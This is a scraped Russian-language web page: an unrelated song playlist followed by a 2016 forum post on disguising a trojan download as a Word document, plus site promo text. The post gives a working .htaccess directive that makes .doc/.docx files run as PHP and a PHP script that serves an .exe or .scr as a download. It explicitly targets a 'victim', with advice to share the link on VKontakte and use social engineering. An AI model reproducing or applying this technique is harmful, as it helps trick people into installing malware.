Хочешь свой плейлист?
1. AC DC - Back in Black
2. AC DC - HIGWAY TO HELL
3. AC⁄DC - Touch To Much
4. Alle Farben - Bad Ideas
5. Arilena Ara - Nëntori (Bess Remix)
6. Artik pres. Asti - Никому не отдам
7. Ben Delay - I Never Felt so Right (Club Mix)
8. Bob Marley - Three Little Birds
9. Brandon Flowers - Can't Deny My Love
10. Burak Yeter feat. Danelle Sandoval - Tuesday
11. D.idJ - DoIt
12. Deadpool Rap - Sexy Motherfucker
13. Ellie Goulding - Lights
14. Ellie Goulding - Little Dreams
15. Eminem - Ass Like That
16. Estradarada - Вите Надо Выйти
17. Example - Changed The Way You Kiss Me
18. Gutter Brothers - Bitch (Original Mix)
19. IOWA - Нам же нравится одно и тоже (2014)
20. Innerpartysystem - American Trash
21. Jah Khalib feat. Кравц - Do It
22. Justin Timberlake - My Love (feat. T.I.)
23. Kadebostany - Teddy Bear (Astero Remix)
24. Lana Del Rey - Serial Killer
25. Lana Del Rey - Serial Killer (K Theory Remix)
26. M83 - Oblivion
27. METAHESH - Better Than Sex
28. Mapei - Don't Wait
29. Misha Daniels - Run Away (Deep Mix)
30. Moonbeam & Indifferent Guy Eva Pavlova - Follow Me
31. Mos Def And Massive Attack - I Against I
32. Nero - Satisfy (Original Mix)
33. No Limits, Jovan Wilder - Slow Down
34. Oh Wonder - Shark (Illenium Remix)
35. Queen - I Want To Break Free
36. Radio Record - РОДРИГЕС ТИМУР
37. Shakira - Waka Waka (Time for Africa)
38. Snakehips & MØ - Don't Leave
39. The Black Eyed Peas - Meet Me Halfway
40. The Prodigy - Girls
41. The Rolling Stones - God Gave Me Everything
42. The Weeknd ft. Daft Punk - Starboy
43. Vitalic - Poison Lips
44. Wiz Khalifa - Work Hard, Play Hard
45. Баста - Голос (feat. Полина Гагарина)
46. Батишта и Ромади - Формула любви
47. Би - 2 & Чичерина
48. Градусы - Радио дождь
49. Елка - Грею счастье внутри
50. Иван Дорн - Ты всегда в плюсе
51. Каста - Радиосигналы
52. Кравц - Море
53. Марсу Нужны Любовники - Ветер сдувает с крыш
54. Марсу Нужны Любовники - Дальневосток
55. Марсу Нужны Любовники - Её глаза
56. Марсу Нужны Любовники - Застелю Цветами
57. Марсу Нужны Любовники - Скользим
58. Михаил Озеров & Ирина Обрезкова - Лава
59. Моя Мишель - Настя
60. ПИЦЦА & L'One - Мир
61. Пика - Патимейкер
62. Пицца - Романс

Добро пожаловать на DevsAid.Com!

Внимание! Объявляем конкурс на лучший новостной пост!
Получай уведомления в Telegram или по СМС!
Заработай на публикации тем на форуме!


Подмена расширений на уровне сервера или впариваем троян

Тема в разделе "Другое", создана пользователем Dump_Bot, 10 сен 2016.


  1. Доброго дня/вечера/ночи.

    Сегодня мы поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.

    Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.


    Ну что же, давайте приступим.

    1. Открываем блокнот, туда пишем:

    AddType application/x-httpd-php .doc .docx

    Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.

    2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:

    <?
    header(‘Content-Type: application/octet-stream’);
    header(‘Content-Disposition: attachment; filename=имя файла’);
    echo file_get_contents(‘путь к файлу’);
    ?>

    Пример:

    <?
    header(‘Content-Type: application/octet-stream’);
    header(‘Content-Disposition: attachment; filename=lol.exe‘);
    echo file_get_contents(‘http://domain/lol.exe‘);
    ?>

    Если же вы заливаете в корень, то можно написать последнюю строчку и так:

    echo file_get_contents(‘lol.exe‘);

    Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.

    Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.

    Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
     

    Загрузка...
  • Кто мы?

    2 разработчика которые решили помочь другим разработчикам в решении их проблем, а так же пользователям с поиском самых свежих и качественных инфопродуктов. За 4 с небольшим месяца мы создали этот форум на который заходят ежедневно 1500 человек и посещаемость постоянно растёт. Мы создали панель лицензирования для защиты PHP скриптов от воровства и SEO панель для мониторинга наших сайтов и выбора верной стратегии их развития. Мы надеемся что то что мы создали пригодится Вам и возможно Вы поможете нам развиваться и совершенствоваться вместе с Вами.
  • Набираем команду!

    Мы набираем в нашу команду умных и амбициозных людей! Не важно в какой сфере Вы преуспели, Вы можете попасть в нашу команду и развивать с нами действительно достойный ресурс.

    Вступай!